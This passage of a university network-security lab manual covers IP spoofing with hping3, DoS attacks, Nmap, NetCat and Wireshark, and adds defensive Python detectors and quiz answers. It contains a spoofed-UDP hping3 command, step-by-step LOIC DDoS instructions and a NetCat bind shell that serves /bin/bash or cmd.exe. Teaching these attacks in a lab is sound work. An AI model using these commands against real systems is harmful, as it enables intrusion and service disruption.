specifies that 10 packets should be sent to the target IP address.

Similarly, to send a single UDP packet with a spoofed source IP address and a source port number of 53
using hping3, the following command can be used:

sudo hping3 -2 -s 53 -a <spoofed IP> -c 1 <target IP> --udp -p 53

In this command, the -c 1 option specifies that only one UDP packet should be sent to the target IP address.

It is important to note that using the hping3 -c command for malicious purposes is illegal and unethical. It
should only be used for ethical hacking, network security testing, and educational purposes. Additionally,
IP Spoofing can be harmful and cause disruptions to the network, so it should be used with caution and
only with proper authorization and permission.

• How to Send UDP Packets:

Command: hping3 --udp 192.168.254.130 -c 4

The above command sends 4 UDP packets to the mentioned IP address.

The hping3 --udp command is used to send User Datagram Protocol (UDP) packets using the hping3 tool.
Here is an example of how to use the hping3 --udp command:

Command: sudo hping3 -2 -s 53 -a <spoofed IP> -c 1 <target IP> --udp -p 53

In this example, the -2 option specifies that the packet should be a raw IP packet, the -s 53 option specifies
the source port number as 53 (which is commonly used for DNS), the -a option specifies the spoofed IP
address, the -c 1 option specifies that only one packet should be sent, the --udp option specifies that the
packet should be a UDP packet, and the -p 53 option specifies the destination port number as 53.

This command will send a single UDP packet to the target system with a spoofed source IP address and a
source port number of 53. The destination IP address and port number are specified by the <target IP> and
-p 53 options, respectively.

It is important to note that using the hping3 --udp command for malicious purposes is illegal and unethical.
It should only be used for ethical hacking, network security testing, and educational purposes.
Additionally, IP Spoofing can be harmful and cause disruptions to the network, so it should be used with
caution and only with proper authorization and permission.

How to Prevent IP Spoofing?

There are several ways to prevent IP Spoofing attacks. Some of the most effective methods are packet
filtering, ingress filtering, network address translation, encryption, IDS or IPS, and implementing best
practices. Commonly used packet filtering tools in Kali Linux are iptables, nftables, ufw and firewalld.

ufw (Uncomplicated Firewall) is a frontend for iptables that provides a simpler and easier-to-use
interface for configuring firewall rules in Ubuntu-based systems, including Kali Linux. Here are some
basic commands to use ufw:

1. Enable or disable ufw:


To enable ufw, run the following command:
sudo ufw enable

To disable ufw, run the following command:


sudo ufw disable

2. Allow or deny incoming or outgoing traffic:

To allow incoming traffic on a specific port, run the following command:


sudo ufw allow <port>/<protocol>

For example, to allow incoming TCP traffic on port 22 (SSH), run the following command:
sudo ufw allow 22/tcp

To deny incoming traffic on a specific port, run the following command:


sudo ufw deny <port>/<protocol>

For example, to deny incoming UDP traffic on port 53 (DNS), run the following command:
sudo ufw deny 53/udp

To allow outgoing traffic to a specific IP address or network, run the following command:
sudo ufw allow out to <IP address or network>

For example, to allow outgoing traffic to the IP address 192.168.1.100, run the following command:
sudo ufw allow out to 192.168.1.100

To deny outgoing traffic to a specific IP address or network, run the following command:
sudo ufw deny out to <IP address or network>

For example, to deny outgoing traffic to the IP address 192.168.1.100, run the following command:
sudo ufw deny out to 192.168.1.100

3. Check the status of ufw:


To check the status of ufw, run the following command:
sudo ufw status

This command will show the current status of ufw and the firewall rules that are currently in effect.

These are some basic commands for using ufw in Kali Linux. There are many other options and features
available in ufw that you can explore by reading the documentation or running ufw --help.

What is a DoS Attack?

A DoS (Denial of Service) attack is a type of cyberattack in which an attacker tries to make a website,
computer system, or network unavailable to its users by overwhelming it with traffic or requests. This is
typically done by flooding the targeted system with traffic or requests until it is unable to respond to
legitimate traffic, effectively making it unavailable to users.

There are several types of DoS attacks, including:

• SYN Flood Attack: This type of attack exploits the way TCP/IP protocols establish a connection
between two devices by sending many connection requests to the target server, but never
completing the connection.

• UDP Flood Attack: This attack targets the target server with a large volume of User Datagram
Protocol (UDP) packets with invalid IP addresses, which ultimately floods the target server.

• Ping of Death Attack: This attack sends an oversized ping packet to a target server, causing it to
crash or become unavailable.

• Smurf Attack: This attack exploits the Internet Control Message Protocol (ICMP) and sends many
ICMP echo request packets to the broadcast address of a network, which results in a flood of replies
overwhelming the target server.
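As an added example that is not from the manual, the SYN flood described above seen from the defender's side: a detector that counts, per source address, TCP handshakes that were opened with a SYN but never completed with the final ACK inside a sliding time window, and raises an alert once a source holds too many half-open connections. The event records are constructed; on a real sensor they would come from a packet capture or a firewall connection log.

```python
"""Added example: SYN flood detection by counting half-open TCP connections
per source inside a sliding window. Events are constructed tuples of
(timestamp_seconds, source_ip, source_port, tcp_flag)."""
from collections import defaultdict, deque


class SynFloodDetector:
    """Track SYNs that never complete the handshake (no ACK from the same
    source/port within `window` seconds). A source holding more than
    `max_half_open` outstanding handshakes is reported once."""

    def __init__(self, window=5.0, max_half_open=20):
        self.window = window
        self.max_half_open = max_half_open
        self.pending = defaultdict(deque)  # src -> deque[(ts, sport)] awaiting ACK
        self.alerted = set()

    def _expire(self, now):
        # Forget handshakes older than the window so a long-idle source does
        # not accumulate stale entries (a kernel's SYN backlog does the same).
        for src in list(self.pending):
            q = self.pending[src]
            while q and now - q[0][0] > self.window:
                q.popleft()
            if not q:
                del self.pending[src]

    def half_open(self, src):
        """Number of handshakes from `src` still waiting for their ACK."""
        return len(self.pending.get(src, ()))

    def observe(self, ts, src, sport, flags):
        """Feed one TCP packet; return an alert string or None."""
        self._expire(ts)
        if flags == "S":  # client SYN: a handshake is opened
            self.pending[src].append((ts, sport))
        elif flags == "A" and src in self.pending:  # final ACK: handshake done
            for item in self.pending[src]:
                if item[1] == sport:
                    self.pending[src].remove(item)
                    break
        n = self.half_open(src)
        if n > self.max_half_open and src not in self.alerted:
            self.alerted.add(src)
            return (f"SYN flood suspected from {src}: {n} half-open "
                    f"connections within {self.window:g}s")
        return None


def build_sample_events():
    """Constructed traffic: one well-behaved client and one flooder."""
    events = []
    # Legitimate client: each SYN is followed by its ACK 50 ms later.
    for i in range(10):
        t = i * 0.5
        events.append((t, "192.168.1.20", 40000 + i, "S"))
        events.append((t + 0.05, "192.168.1.20", 40000 + i, "A"))
    # Flooder: 40 SYNs in one second, none ever acknowledged.
    for i in range(40):
        events.append((2.0 + i * 0.025, "203.0.113.9", 50000 + i, "S"))
    events.sort(key=lambda e: e[0])
    return events


def run_detector(events, **kwargs):
    """Replay events through a detector; return (alerts, detector)."""
    det = SynFloodDetector(**kwargs)
    alerts = []
    for ts, src, sport, flags in events:
        alert = det.observe(ts, src, sport, flags)
        if alert:
            alerts.append(alert)
    return alerts, det


if __name__ == "__main__":
    for line in run_detector(build_sample_events())[0]:
        print(line)
```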

DoS attacks are usually carried out with the aim of causing disruption or damage to the target system or
network, and can have serious consequences, such as lost revenue, reputational damage, and even legal
liability in some cases.

What are the tools available to perform DoS/DDoS attack?

The most commonly used tools for DoS attacks are the following.


• Low Orbit Ion Cannon (LOIC)
• High Orbit Ion Cannon (HOIC)
• Slowloris
• R.U.D.Y (R-U-DEAD-Yet)

NOTE: performing a DoS attack or any other malicious activity on any live server or device is illegal
and can result in severe consequences, including fines and imprisonment. Please use this tool only
under the supervision of faculty in a lab environment.

Step 1: Downloading LOIC (low orbit ion cannon)


Download LOIC from sourceforge.net. Your antivirus will warn you that it is a malicious tool, because
it is a DDoS tool, so expect such errors. Extract the zip file and run the software.

Step 2: Run LOIC

You will see the below menu, which shows all the options for a DDoS attack.

Step 3: Setting Up and Starting DDOS attack


There are many options that you can configure with LOIC. You can select an IP or a URL as the target.

You can select the type of data you want to send along with the message:

You can also configure the port, the number of threads, and the speed of the DDoS attack.

Once you have configured everything, click on the following button:



IMMA CHARGIN MAH LAZER (I’m charging my laser)


Now you can see the status of the attack in the status section:

How does the LOIC work?


As you can see from the above demo, the tool works by flooding the target server with TCP, UDP, or
HTTP packets with the goal of overloading the service. One hacker using LOIC cannot generate
enough traffic to make a serious impact on a target; however, some hackers use botnets built through
phishing and malware attacks to perform the same type of attack, in which thousands of devices
coordinate a simultaneous attack on the same target, resulting in a large DDoS attack.

How to prevent DoS Attack?

There are several measures that organizations can take to prevent or mitigate the impact of a DoS attack.
Some of the commonly used methods are increasing network bandwidth, use of firewalls, intrusion
prevention systems (IPS), load balancing, and use of content delivery networks (CDN). Some
commonly used tools to mitigate DoS attacks are Fail2ban, Snort, ModSecurity, Slowloris and Hping3.

By implementing these measures, organizations can help to prevent or reduce the impact of DoS attacks
on their systems and networks. Additionally, regular training and awareness programs can help employees
to identify and report suspicious activity, minimizing the risk of an attack.

Quiz:

What does the output of the following command explain in few lines and Attach Screen Shot of output.
Take the appropriate IP Address where necessary.

1. hping3 --udp <IP ADDRESS> -c 8

2. hping3 -2 -s 53 -a <spoofed IP> -c 1 <target IP> --udp -p 53


3. hping3 -h

4. What is IP Spoofing? What are the tools available to perform IP Spoofing?

IP Spoofing is a technique used to impersonate another device by falsifying the source
IP address in network packets. Attackers use this method to hide their identity, bypass access
controls, or launch attacks like denial-of-service (DoS) or man-in-the-middle (MITM).

Tools for IP Spoofing

hping: Packet crafting and analysis tool for TCP/IP spoofing.
Scapy: Python-based tool for creating custom spoofed packets.
Nemesis: Utility for injecting custom spoofed packets.
Cain & Abel: Windows-based tool for network sniffing and spoofing.
Ettercap: Tool for intercepting and altering communications.
Dsniff: Set of tools for network auditing, including spoofing.
SMAP: Tool for spoofing ICMP/TCP packets.

5. What are the ways to prevent IP Spoofing?

Packet Filtering: Use ingress/egress filtering to block spoofed packets.
Encryption: Encrypt communication with IPSec or SSL/TLS.
Network Monitoring: Use IDS/IPS to detect unusual traffic patterns.
Spoofing Detection Tools: Implement uRPF to validate source IPs.
Strong Authentication: Use MFA or certificates for user verification.
Network Segmentation: Separate critical systems into secure zones.
Firewalls: Block external packets claiming to be from internal IPs.
Rate Limiting: Limit traffic to reduce the impact of DoS attacks

6. How DoS/DDoS attack is harmful to any organization? What steps organizations should take to
prevent/mitigate such attack?

Impact of DoS/DDoS Attacks

Disrupts Services: Overwhelms servers, causing downtime and service unavailability.
Financial Loss: Downtime leads to lost revenue and potential customer loss.
Reputation Damage: Extended outages can harm the organization’s public image.
Security Risks: May be used to distract from other malicious activities like data breaches.

Prevention/Mitigation Steps
Firewalls & Load Balancers: Use to filter malicious traffic and distribute loads.
DDoS Protection Services: Employ services like Cloudflare or Akamai to absorb attack traffic.
Rate Limiting: Limit requests from specific IPs to prevent overloading.
Redundant Infrastructure: Use multiple servers and locations to balance the load.
Traffic Monitoring: Use IDS/IPS to detect abnormal traffic patterns early.
Anycast Routing: Distribute traffic across multiple servers to reduce the attack's impact.

Conclusion:
In conclusion, this experiment provided an understanding of IP spoofing and DoS attacks, demonstrating
how attackers use these techniques to compromise networks. By evaluating different network defense
tools, students learned how to detect and prevent these attacks using mechanisms like packet filtering,
ACLs, and encryption. The experiment also emphasized testing these defense tools in a simulated
environment to assess their strengths and weaknesses, enhancing the students' ability to defend
against real-world network attacks.

Rubric:

Criteria 1 2 3 4 Total
Marks

Faculty Signature

Experiment No: 03
Explore the Nmap tool and list how it can be used for network defense.
Date:

Competency and Practical Skills:

Relevant CO: Evaluate network defense tools.

Objectives:
• To understand what IP spoofing and DoS attack are and how they are used to launch attacks on a
network.
• To learn about the different types of IP spoofing attacks and how they can be detected and
prevented using network defense tools.
• To compare the effectiveness of various network defense tools against IP spoofing and DoS
attacks, such as packet filtering, ingress filtering, egress filtering, encryption, authentication, and
anomaly detection.
• To apply the network defense tools to a simulated network environment and test their performance
against IP spoofing and DoS attacks using different attack scenarios and
parameters.
• To evaluate the results of the network defense tools and analyze their strengths and weaknesses
against IP spoofing and DoS attacks.

Equipment/Instruments: Computer with Internet

Introduction to Nmap
Nmap, short for "Network Mapper," is a popular open-source tool used for network exploration,
management, and security auditing. It was initially developed in the late 1990s by Gordon Lyon (also
known by his pseudonym "Fyodor") and has since become one of the most widely used network scanning
tools.

Nmap is designed to scan and map networks, identify hosts, and discover available services, operating
systems, and vulnerabilities. It can also be used to audit the security of networked systems by performing
various types of scans, such as port scanning, OS detection, version detection, and vulnerability scanning.

Nmap is highly customizable and flexible, with many options and settings available to users. It is also
cross-platform and can run on various operating systems, including Windows, macOS, and Linux.

Overall, Nmap is a powerful tool for network exploration and security auditing that has become an
essential part of many network administrators' and security professionals' toolkits.

Here are some of the most common uses of Nmap:

1. Network mapping: Nmap can be used to map out networks and identify hosts, devices, and
services running on them. This is useful for network administrators to get a clear understanding
of their network topology and for security professionals to identify potential attack surfaces.

2. Port scanning: Nmap can be used to scan for open ports on hosts and identify the services running
on them. This is useful for network administrators to ensure that all required services are up and
running and for security professionals to identify potential vulnerabilities.

3. OS detection: Nmap can be used to detect the operating system running on a host based on its
responses to various probes. This is useful for network administrators to ensure that all systems
are running the required operating system and for security professionals to identify potential
vulnerabilities.

4. Version detection: Nmap can be used to identify the version of the software running on a host
based on its responses to various probes. This is useful for network administrators to ensure that
all systems are running the required software version and for security professionals to identify
potential vulnerabilities.

5. Vulnerability scanning: Nmap can be used to scan for known vulnerabilities on hosts and identify
potential security issues. This is useful for security professionals to identify and address potential
vulnerabilities before they can be exploited.

Nmap features include:


1. Host discovery – Identifying hosts on a network. For example, listing the hosts that respond to
TCP and/or ICMP requests or have a particular port open. Nmap offers several methods for host
discovery, including:
a. Ping sweep: Nmap sends ICMP echo requests (pings) to a range of IP addresses and checks
for responses. This is the simplest and most common method of host discovery, but it may
not work in all cases as some hosts may block ICMP traffic.
b. ARP scanning: Nmap sends ARP requests to a range of IP addresses and checks for
responses. This method is more reliable than ping sweep, as it works at the data-link layer
and can discover hosts that are configured not to respond to ICMP traffic.
c. TCP SYN scanning: Nmap sends TCP SYN packets to a range of IP addresses and checks
for responses. This method is stealthier than ping sweep and ARP scanning, as it doesn't
complete the TCP handshake and leaves no trace in the target's logs.
d. UDP scanning: Nmap sends UDP packets to a range of IP addresses and checks for
responses. This method is useful for discovering hosts that are running services that don't
respond to TCP traffic.
2. Port scanning – Enumerating the open ports on target hosts.
a. TCP SYN scan: This is the most common type of port scan and involves sending a SYN
packet to each port and analyzing the response. If the port is open, the target will respond
with a SYN-ACK packet, and if it's closed, the target will respond with a RST packet.
b. TCP connect scan: This method involves initiating a full TCP connection to each port and
analyzing the response. This method is slower than SYN scanning but may be more reliable
in certain cases.
c. UDP scan: This method involves sending a UDP packet to each port and analyzing the
response. UDP scanning can be slower than TCP scanning, as UDP is a connectionless
protocol, and there may not be a response from closed ports.
d. Stealth scan: This method is designed to avoid detection by sending packets that are less
likely to be logged by intrusion detection systems (IDS) and firewalls. This method can be
slower and less reliable than other scanning methods.
e. Fragmentation scan: This method involves fragmenting packets to evade firewall rules and
IDS. This method can be slower and less reliable than other scanning methods.

3. Version detection – Interrogating network services on remote devices to determine application
name and version number.
4. TCP/IP stack fingerprinting – Determining the operating system and hardware characteristics
of a network device.

Different Nmap commands and their examples:

• nmap [target]:
a. This command targets a single IP address (host).
b. For example, nmap 192.168.1.33
c. In this example nmap scans this IP address and fetches its MAC address and open
ports.

(Fig: Targeting Single IP Address)



• nmap [target1 target2 ...]:

a. This command targets multiple IP addresses (hosts).
b. For example, nmap 192.168.1.33 192.168.1.42
c. In this example nmap targets multiple IPs and fetches all the details, such as MAC address and
port state (open/closed).

(Fig: Scanning Multiple IP)



• Scan a Range of Hosts:

a. Syntax: nmap [range of IP addresses]
b. This command is used to scan a specific range of IP addresses (hosts).
c. For example, nmap 192.168.1.1-100
d. Here we get the information of the different hosts that are available in the range 1-100.

• Operating System Detection:

a. Syntax: nmap -O [target]
b. This command is used to detect the operating system of the targeted IP address.
c. For example, we have one IP address, 192.168.1.42, so we target that IP and get the OS that
this particular system is currently running, along with some port information.

• Scan an Entire Subnet:

a. Syntax: nmap [ip address/cidr]
b. This command is used to scan an entire subnet.
c. For example, nmap 192.168.1.1/24
d. In this example we get all the hosts in the subnet 192.168.1.1/24.
e. This subnet can hold a maximum of 255 hosts, but in this subnet only 3 hosts are
up: 192.168.1.1, 192.168.1.13 and 192.168.1.42.

• Perform a Sequential Port Scan:

a. Syntax: nmap -r [target]
b. nmap -r 192.168.1.1
c. This command scans all the ports in sequential order for a particular IP address or host.

• Perform an Aggressive Scan:

a. Syntax: nmap -A [target]
b. nmap -A 192.168.1.33
c. Aggressive mode enables OS detection (-O), version detection (-sV), script scanning (-sC),
and traceroute (--traceroute). This mode sends many more probes and is more likely to
be detected, but it provides a lot of valuable host information.

• Only Display Open Ports:

a. Syntax: nmap --open [target]
b. nmap --open 192.168.1.1
c. Nmap has the option --open, which filters out all the other port states. If you are
scanning under Linux, you could also use grep to achieve a very similar result.
d. This command shows only open or possibly open ports.

• Scanning a website's public IP:

a. With this command we scan a website's public IP address and gather information about it.
b. nmap -v -A scanme.nmap.org

• Scan Specific Ports

a. Syntax: nmap -p [port number(s)] [target]
b. nmap -p 80 192.168.1.1 (scans only port 80)
c. nmap -p 1-999 192.168.1.1 (scans the port range 1-999)
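As an added example that is not from the manual, a small Python parser for nmap's normal text output that turns a scan into a per-host list of open ports and compares it against a baseline of expected services, which is the defensive use of port scanning this experiment describes (checking that only the required services are reachable). The scan text, the baseline and the MAC address are constructed.

```python
"""Added example: parse nmap's normal output and diff each host's open ports
against an expected-services baseline. Scan text and baseline are constructed."""
import re

# "Nmap scan report for host (1.2.3.4)" or "Nmap scan report for 1.2.3.4"
HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\d+\.\d+\.\d+\.\d+)\))?")
# "22/tcp   open  ssh"  ->  port, proto, state, service
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

# Constructed scan of two lab hosts (MAC address and names are made up).
SAMPLE_SCAN = """\
Nmap scan report for 192.168.1.1
Host is up (0.0021s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
MAC Address: 00:11:22:33:44:55 (Constructed Vendor)

Nmap scan report for fileserver.lab (192.168.1.42)
Host is up (0.0010s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
445/tcp  open     microsoft-ds
3389/tcp open     ms-wbt-server
8080/tcp filtered http-proxy

Nmap done: 256 IP addresses (2 hosts up) scanned in 12.34 seconds
"""

# Constructed baseline: the services each host is supposed to expose.
BASELINE = {
    "192.168.1.1": {"22/tcp", "53/tcp", "80/tcp"},
    "192.168.1.42": {"22/tcp", "445/tcp"},
}


def port_key(port_proto):
    """Sort '22/tcp', '443/tcp', '80/tcp' numerically rather than as strings."""
    return (int(port_proto.split("/")[0]), port_proto)


def parse_nmap_output(text):
    """Return {host_ip: {'port/proto': (state, service)}} from nmap stdout."""
    hosts = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(2) or m.group(1)  # prefer the IP over the hostname
            hosts[current] = {}
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service = m.groups()
            hosts[current][f"{port}/{proto}"] = (state, service)
    return hosts


def open_ports(hosts):
    """Per host, the ports nmap --open would show: open or possibly open."""
    return {
        host: sorted((p for p, (state, _) in ports.items()
                      if state in ("open", "open|filtered")), key=port_key)
        for host, ports in hosts.items()
    }


def compare_to_baseline(hosts, baseline):
    """Return {host: {'unexpected': [...], 'missing': [...]}} for every host
    whose open ports differ from the baseline (unknown hosts: all unexpected)."""
    findings = {}
    for host, ports in open_ports(hosts).items():
        allowed = baseline.get(host, set())
        unexpected = [p for p in ports if p not in allowed]
        missing = sorted(allowed - set(ports), key=port_key)
        if unexpected or missing:
            findings[host] = {"unexpected": unexpected, "missing": missing}
    return findings


if __name__ == "__main__":
    scan = parse_nmap_output(SAMPLE_SCAN)
    for host, ports in open_ports(scan).items():
        print(host, ports)
    print(compare_to_baseline(scan, BASELINE))
```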

Conclusion

In conclusion, this experiment introduced Nmap as a versatile and powerful tool for network defense.
Students learned how Nmap can be used to scan networks, identify hosts and vulnerabilities, and
perform various types of security audits. By exploring its features and functions, the experiment
demonstrated Nmap's effectiveness in securing networks and defending against potential threats,
making it an essential tool for network administrators and cybersecurity professionals.

Rubrics:

Criteria 1 2 3 4 5 Total
Marks

Faculty Signature

Experiment No: 04
Explore the NetCat tool.
Date:

Competency and Practical Skills:

Relevant CO: Evaluate network defense tools

Objectives:
• Understanding the basics of network communication and the role of NetCat in facilitating it.
• Learning the syntax and basic usage of the NetCat command-line interface.
• Understanding how to use NetCat for port scanning and banner grabbing.
• Understanding how to use NetCat for file transfer and remote shell access.
• Understanding how to use NetCat for network debugging and troubleshooting.
• Understanding the security implications of using NetCat and how to use it responsibly.
• Exploring advanced NetCat usage, such as creating backdoors and establishing encrypted
connections.
• Learning how NetCat can be used in conjunction with other networking tools and protocols, such
as Nmap and SSH.
• Practicing using NetCat in a simulated network environment to gain hands-on experience and
proficiency.
• Developing critical thinking skills by analyzing and interpreting the results of NetCat commands
and applying them to real-world networking scenarios.

Introduction to NetCat

NetCat, also known as "nc," is a powerful and versatile command-line tool used for network
communication. It was first developed in the mid-1990s by Hobbit, a member of the hacker collective
known as L0pht Heavy Industries and has since become a popular utility in the field of computer
networking and security.

NetCat allows users to create, send, and receive network packets over various protocols, including TCP,
UDP, and ICMP. It can also be used for port scanning, banner grabbing, and network debugging. Its
simplicity and flexibility have made it a go-to tool for system administrators, network engineers, and
security professionals.

Some of the common use cases for NetCat include transferring files between systems, establishing a
remote shell access to a system, and testing network services for vulnerabilities. Additionally, NetCat can
be used in combination with other tools and protocols, such as Nmap and SSH, to further extend its
capabilities.

While NetCat is a powerful tool, its power can also be a double-edged sword, as it can be used for
malicious purposes. As such, it's important to use NetCat responsibly and with the appropriate permissions
and safeguards in place.

Some of the common functionalities of NetCat include:



• Port Scanning: NetCat can be used to scan for open ports on a target system. This can be useful
for identifying potential vulnerabilities or misconfigured services.

• Banner Grabbing: NetCat can be used to retrieve banner information from network services
running on a target system. This can provide valuable information about the software and version
numbers running on those services.

• File Transfer: NetCat can be used to transfer files between systems over a network. This can be
useful for transferring large files quickly and efficiently.

• Remote Shell Access: NetCat can be used to establish remote shell access to a target system. This
can provide a convenient way to access a remote system and perform tasks without physically
being at the machine.

• Chatting: NetCat can be used to chat with other users on a network. This can be useful for
communication in environments where other chat applications are unavailable.

• Port Forwarding: NetCat can be used to forward traffic from one port to another on a local or
remote system. This can be useful for accessing services on a remote system that are not directly
accessible from the local network.

• Network Debugging: NetCat can be used to troubleshoot network issues and test network
connectivity. This can help identify problems and determine if network services are functioning
correctly.

• Backdoor Creation: NetCat can be used to create backdoors on a target system. This can provide
unauthorized access to the target system, making it a potentially dangerous feature if used
maliciously.

In summary, NetCat is a powerful tool with a wide range of functionalities that make it a valuable asset
to network professionals.

In Linux, NetCat comes pre-installed. If it is not installed, you can install it on Ubuntu with the
following command:
sudo apt-get install netcat

For Windows, Download zip file from the URL - https://eternallybored.org/misc/netcat/


Once Downloaded, Unzip the file and through Command Prompt you can access NetCat.

How to use NetCat?


• Generalized Syntax is- nc [parameters] [Hostname] [Port Number]
• Example, nc -v google.com 80, then use GET method using GET / HTTP/1.0
• Host name can be IP Address, URL or Name.

Demo – 1: Chat Application using NetCat

Steps:
1. Open two terminals.

2. In Terminal 01, Type: nc -vlp 1200

a. v for verbose
b. l for listening on a specific port for incoming requests
c. p for specifying the port number, in our case 1200. (Don’t use a well-known port for this
application)

3. In Terminal 02, Type: nc YourIpAddress 1200


a. Enter your IP address at YourIpAddress followed by same port number.
b. Ex. nc 192.168.1.1 1200

4. Now you can chat through NetCat.


a. This type of chat is not secure.
b. Any network sniffing tool can be used to read the messages.

5. Press ctrl+c in both terminals to exit.



Demo-02 - File Transfer

1. Open Two Terminals


2. In Terminal 01, Type: nc -vlp 1200 < file.txt
a. Create file.txt in the root directory.
3. In Terminal 02, Type: nc IpAddress 1200 > receive.txt
a. Ex. nc 192.168.1.1 1200 > receive.txt
b. After execution receive.txt will be created with content of file.txt

This command will transfer the data of file.txt to receive.txt.



Demo-03 - HTTP Request

1. Open one terminal.

2. Type: nc url 80
   a. Here you specify the URL of any website or an IP address.
   b. Ex. nc www.gtu.ac.in 80
   c. It will connect on port 80. You can also use other ports, such as 22 for SSH.
   d. Since we are connected on port 80, we can request a web page using the GET command.
3. Type: GET / HTTP/1.0
4. Type: Host: url, then press Enter on an empty line; the blank line ends the request headers and the server sends its response.

Demo-04 - Port Scanning

1. In a terminal, type: nc -v -n IpAddress PortRangeLow-PortRangeHigh

   a. Ex. nc -v -n 192.168.1.1 1-1000
   b. -n skips DNS resolution, so the target is given as an IP address.
2. This command scans the given port range for open ports. If a port is open, NetCat connects to it and reports the connection.

Demo-05 - Reverse Shell (Backdoor)

• In this demo, a security expert/attacker can execute programs on a remote PC/server.

• You can try this on your own PC using two terminals.

1. Open two terminals.

2. In Terminal 01, type: ncat -vlp PortNo -e executablefile
   a. For Linux: ncat -vlp 1200 -e /bin/bash
   b. For Windows: ncat -vlp 1200 -e cmd.exe
3. In Terminal 02, type: nc IpAddress PortNo
   a. Ex. nc 192.168.43.217 1200
4. Now you can execute terminal commands on the listening machine.
   Type Linux commands such as: ls
   Type Windows commands such as: dir, services.msc

References

Conclusion

Defense tools must be equipped to detect unauthorized use of NetCat, particularly in scenarios where it is used to establish hidden channels or transfer data over non-standard ports.
• File Transfer: Security tools must ensure proper encryption, authentication, and monitoring of file transfers to detect anomalies. Implementing strict file integrity checks and transfer logs can help detect unauthorized actions.
• HTTP Request: Web application firewalls (WAFs) and intrusion detection systems (IDS) must inspect HTTP traffic for unusual patterns, such as large payloads, repeated requests, and malformed headers that may indicate malicious intent.
• Port Scanning: A network defense strategy should include port monitoring, detection of repeated connection attempts, and rate-limiting to respond to suspicious port-scanning activities.
• Reverse Shell (Backdoor): Defense tools need to monitor outbound traffic closely, flagging unusual reverse connection attempts. Additionally, deploying endpoint detection and response (EDR) tools to prevent unauthorized access is essential.
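The port-scan detection the conclusion calls for, as an added example that is not part of the manual: it parses constructed connection-log lines of the assumed form `<timestamp> src=... dst=... dport=...` and flags a source that touches many distinct ports on one host inside a short sliding time window, which is the traffic shape the Demo-04 scan produces.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Assumed log format (constructed for this example; adapt the regex to your firewall's syslog).
LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)$")


def parse_line(line: str) -> Optional[Tuple[datetime, str, str, int]]:
    """Return (timestamp, src, dst, dport) or None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"])


def detect_port_scans(lines: List[str], window_seconds: int = 10,
                      min_ports: int = 20) -> Dict[Tuple[str, str], int]:
    """Map (src, dst) -> largest number of distinct destination ports seen inside any
    window_seconds-long sliding window, for pairs that reach min_ports (a scan signature).
    A single port hit repeatedly (a normal client reconnecting) never trips this check."""
    events: Dict[Tuple[str, str], List[Tuple[datetime, int]]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            events[(rec[1], rec[2])].append((rec[0], rec[3]))
    window = timedelta(seconds=window_seconds)
    alerts: Dict[Tuple[str, str], int] = {}
    for key, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window's left edge
                start += 1
            distinct = {port for _, port in evs[start:end + 1]}
            if len(distinct) >= min_ports:
                alerts[key] = max(alerts.get(key, 0), len(distinct))
    return alerts


def constructed_log() -> List[str]:
    """Constructed sample log: a fast scan, a legitimate HTTPS client, and a slow scan."""
    t0 = datetime(2024, 3, 1, 10, 0, 0)   # constructed timestamp
    lines = []
    for i in range(1, 31):    # fast scan: 30 ports in 6 seconds
        ts = (t0 + timedelta(milliseconds=200 * i)).isoformat()
        lines.append(f"{ts} src=192.168.1.50 dst=192.168.1.1 dport={i}")
    for i in range(40):       # legitimate client: one port, many connections
        ts = (t0 + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} src=192.168.1.20 dst=192.168.1.1 dport=443")
    for i in range(25):       # slow scan: one port every 2 seconds
        ts = (t0 + timedelta(seconds=2 * i)).isoformat()
        lines.append(f"{ts} src=192.168.1.60 dst=192.168.1.1 dport={1000 + i}")
    return lines


if __name__ == "__main__":
    print(detect_port_scans(constructed_log()))
    print(detect_port_scans(constructed_log(), window_seconds=60))
```

The slow scanner only shows up when the window is widened, which is the usual trade-off: a longer window catches slower scans but raises the false-positive rate for busy hosts.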

Rubrics:

Criteria 1 2 3 Total
Marks

Faculty Signature

Experiment No: 05
Use Wireshark tool and explore the packet format.

Date:

Relevant CO: Evaluate network defense tools.

Objectives:
1. Understanding of Wireshark tool
• Demonstrates knowledge of Wireshark functionalities and commands
• Describes the purpose of Wireshark in network traffic analysis.
2. Capturing and analyzing network traffic
• Successfully captures network traffic using Wireshark.
• Demonstrates proficiency in filtering and analyzing network traffic.
• Ability to identify common network protocols and their functions.
3. Exploring packet format
• Demonstrates knowledge of the packet format and its components
• Identifies and analyzes different types of packets.
• Ability to interpret packet data and understand its significance.
4. Troubleshooting and problem-solving
• Ability to troubleshoot common Wireshark-related issues.
• Demonstrates proficiency in problem-solving and identifying the root cause of issues.
• Ability to apply best practices in network traffic analysis and troubleshooting.

Introduction to Wireshark
Wireshark is a widely used network protocol analyzer tool that allows users to capture and analyze
network traffic in real-time. It is an open-source tool that provides users with a detailed view of the
network traffic, including the source and destination of packets, their content, and the protocols used.
Wireshark can be used to troubleshoot network issues, identify security threats, and monitor network
activity. It supports a wide range of network protocols, including Ethernet, TCP/IP, HTTP, DNS, and
many others. Wireshark is an essential tool for network administrators, security professionals, and anyone
who needs to monitor and analyze network traffic. With its powerful features and easy-to-use interface,
Wireshark is an excellent choice for anyone looking to gain insight into the inner workings of computer
networks.

To install Wireshark on Linux, follow these steps:

1. Open the Terminal on your Linux system.

2. Update the package repository using the following command:
sudo apt-get update
3. Use the following command to install Wireshark: sudo apt-get install wireshark
4. After installation, type wireshark in the terminal to open it.

To install on the Windows operating system, follow these steps:

